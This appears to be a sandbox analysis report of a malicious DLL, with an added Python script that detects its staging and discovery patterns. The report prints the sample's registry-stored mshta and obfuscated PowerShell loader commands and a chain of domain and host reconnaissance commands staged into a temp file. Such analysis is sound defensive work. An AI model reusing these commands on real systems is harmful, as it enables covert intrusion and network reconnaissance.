N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2144 wrote to memory of 4732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2144 wrote to memory of 4732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2144 wrote to memory of 4732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3944 wrote to memory of 2160 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3944 wrote to memory of 2160 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2160 wrote to memory of 5056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2160 wrote to memory of 5056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 5056 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 5056 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2160 wrote to memory of 3472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2160 wrote to memory of 3472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3472 wrote to memory of 4788 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3472 wrote to memory of 4788 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2160 wrote to memory of 1032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2160 wrote to memory of 1032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2160 wrote to memory of 1032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2160 wrote to memory of 1032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1032 wrote to memory of 3452 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3452 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3452 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3452 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 4544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 4544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 4544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 4544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 4380 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 4380 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4380 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4380 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1032 wrote to memory of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1032 wrote to memory of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1032 wrote to memory of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1032 wrote to memory of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 4380 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4380 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 1032 wrote to memory of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1032 wrote to memory of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1032 wrote to memory of 3408 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 3408 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 4476 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 4476 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4476 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1032 wrote to memory of 2092 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 2092 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 2808 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 2808 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2808 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2808 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1032 wrote to memory of 2328 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 2328 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 1224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 1224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1224 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1224 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1032 wrote to memory of 3956 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 3956 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 3248 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 3248 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3248 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Nju8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nju8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vvxjvnatxo -value gp; new-alias -name yfnjcifda -value iex; yfnjcifda ([System.Text.Encoding]::ASCII.GetString((vvxjvnatxo "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9625.tmp" "c:\Users\Admin\AppData\Local\Temp\z3qafhng\CSCB25259DA0BF41C685C145E7B77F9D39.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96D1.tmp" "c:\Users\Admin\AppData\Local\Temp\4psv2yna\CSC93A0155896EB444294CFA73FFC9517FC.TMP"

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\80C6.bin1 > C:\Users\Admin\AppData\Local\Temp\80C6.bin & del C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
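The process list above records the full chain in one place: mshta.exe runs an inline HTA that evals a value read from HKCU\Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974 (ManagerMemory), powershell.exe aliases gp and iex to read and execute the ProcessOptions value from the same key and then writes into Explorer.EXE, and Explorer spawns a run of cmd.exe discovery commands that append to a single temp file (80C6.bin1) before a final `cmd /U /C "type ... > 80C6.bin & del ..."` copies it and removes the original. Because of `/U` the copy is UTF-16LE, so an ASCII string search on 80C6.bin alone misses the collected output. The Python below is an added example, not part of the sandbox output or the malware; it runs over a list of (image, command line) records constructed from the Processes section and flags those three patterns. The tag names, the discovery-tool list and the record layout are this example's own choices.

```python
"""Added example (not part of the sandbox report): flag the staging and
host-discovery patterns recorded in the Processes section, using only the
command lines shown there. RECORDS is constructed from that list."""
import re
from collections import defaultdict

# (image, command line) pairs copied from the report's Processes section.
RECORDS = [
    (r"C:\Windows\System32\mshta.exe",
     r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Nju8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nju8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"'''),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vvxjvnatxo -value gp; new-alias -name yfnjcifda -value iex; yfnjcifda ([System.Text.Encoding]::ASCII.GetString((vvxjvnatxo "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))'),
    (r"C:\Windows\system32\cmd.exe", r'cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\80C6.bin1"'),
    (r"C:\Windows\system32\cmd.exe", r'cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"'),
    (r"C:\Windows\system32\cmd.exe", r'cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\80C6.bin1"'),
    (r"C:\Windows\system32\cmd.exe", r'cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"'),
    (r"C:\Windows\system32\cmd.exe", r'cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"'),
    (r"C:\Windows\system32\cmd.exe", r'cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"'),
    (r"C:\Windows\system32\cmd.exe", r'cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"'),
    (r"C:\Windows\system32\cmd.exe", r'cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"'),
    (r"C:\Windows\system32\cmd.exe", r'cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"'),
    (r"C:\Windows\system32\cmd.exe", r'cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\80C6.bin1 > C:\Users\Admin\AppData\Local\Temp\80C6.bin & del C:\Users\Admin\AppData\Local\Temp\80C6.bin1"'),
]

# Discovery binaries seen in this report; extend for your own environment.
RECON_TOOLS = {"systeminfo", "net", "net1", "nltest", "nslookup", "tasklist",
               "driverquery", "reg", "wmic"}


def classify(cmdline):
    """Tags for one command line. Tag names are this example's own."""
    low = cmdline.lower()
    tags = []
    # mshta running an inline HTA that evals a registry value (the ManagerMemory stage).
    if "<hta:application>" in low and "regread(" in low and "eval(" in low:
        tags.append("mshta_inline_hta_regread_eval")
    # PowerShell hiding iex behind new-alias and sourcing its script from HKCU AppDataLow.
    if (re.search(r"new-alias\s+-name\s+\S+\s+-value\s+(iex|invoke-expression)\b", low)
            and "appdatalow" in low):
        tags.append("powershell_alias_iex_from_registry")
    return tags


def _cmd_tool_and_target(cmdline):
    """Tool name after cmd's /C and the file its output is redirected to, or None."""
    m = re.search(r'/c\s+"?([^\s"]+)', cmdline, re.I)
    r = re.search(r'>>?\s*"?([^\s"&|]+)', cmdline)
    if not (m and r):
        return None
    tool = m.group(1).rsplit("\\", 1)[-1].split(".")[0].lower()
    return tool, r.group(1).lower()


def recon_chains(records, min_tools=3):
    """Files that collect output of >= min_tools distinct discovery tools, plus the
    set of files later handled by `cmd /U /C "type A > B & del A"` (copy and delete)."""
    by_file = defaultdict(set)
    staged = set()
    for image, cmdline in records:
        if not image.lower().endswith("\\cmd.exe"):
            continue
        parsed = _cmd_tool_and_target(cmdline)
        if parsed is None:
            continue
        tool, target = parsed
        if tool in RECON_TOOLS:
            by_file[target].add(tool)
        elif tool == "type" and re.search(r"&\s*del\s", cmdline, re.I):
            src = re.search(r'type\s+"?([^\s"]+)', cmdline, re.I).group(1).lower()
            staged.add(src)
    chains = {f: sorted(t) for f, t in by_file.items() if len(t) >= min_tools}
    return chains, staged


def analyze(records):
    """Ordered findings: per-process tags, then files that gathered discovery output."""
    findings = [(image.rsplit("\\", 1)[-1], tag)
                for image, cl in records for tag in classify(cl)]
    chains, staged = recon_chains(records)
    for path, tools in sorted(chains.items()):
        findings.append((path, "discovery_output_collected:" + ",".join(tools)))
        if path in staged:
            findings.append((path, "discovery_output_copied_then_deleted"))
    return findings


if __name__ == "__main__":
    for subject, tag in analyze(RECORDS):
        print(f"{tag:60} {subject}")
```

The file-grouping check is deliberately independent of the exact tool list: any temp file that receives redirected output from several different discovery binaries in a short span, followed by a copy-and-delete, is the pattern worth alerting on, whichever loader family produced it.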

Network

Country Destination Domain Proto
US 52.109.8.21:443 tcp
US 67.26.209.254:80 tcp
US 67.26.209.254:80 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 93.184.220.29:80 tcp
US 204.79.197.200:443 tcp
GB 51.104.15.253:443 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
RO 37.120.206.71:80 37.120.206.71 tcp
US 204.79.197.203:80 tcp
RU 5.42.199.72:80 5.42.199.72 tcp
RO 37.120.206.91:80 37.120.206.91 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

memory/4732-130-0x0000000000000000-mapping.dmp

memory/4732-131-0x0000000010000000-0x000000001000E000-memory.dmp

memory/4732-136-0x0000000001470000-0x000000000147D000-memory.dmp

memory/2160-140-0x0000000000000000-mapping.dmp

memory/2160-141-0x0000019673A50000-0x0000019673A72000-memory.dmp

memory/2160-142-0x00007FFC24FB0000-0x00007FFC25A71000-memory.dmp

memory/5056-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.cmdline

MD5 0fd42ad9d1fcf2ecc458caeea500074d
SHA1 f6253dae00cd2c7e74d65c5bfb97df4d4afd0695
SHA256 b8d79550fe87187ab73bd3a2e17bcc4c9daea4c771359d86af0969a0068fe610
SHA512 161e119ec04a2ecc61fa153545586f39c78db2eabcc821953129abbe04790cc62dbae8a4a91d3ed84c799662d4836d0c50769b404fb43dc8ccdda2375495e135

\??\c:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
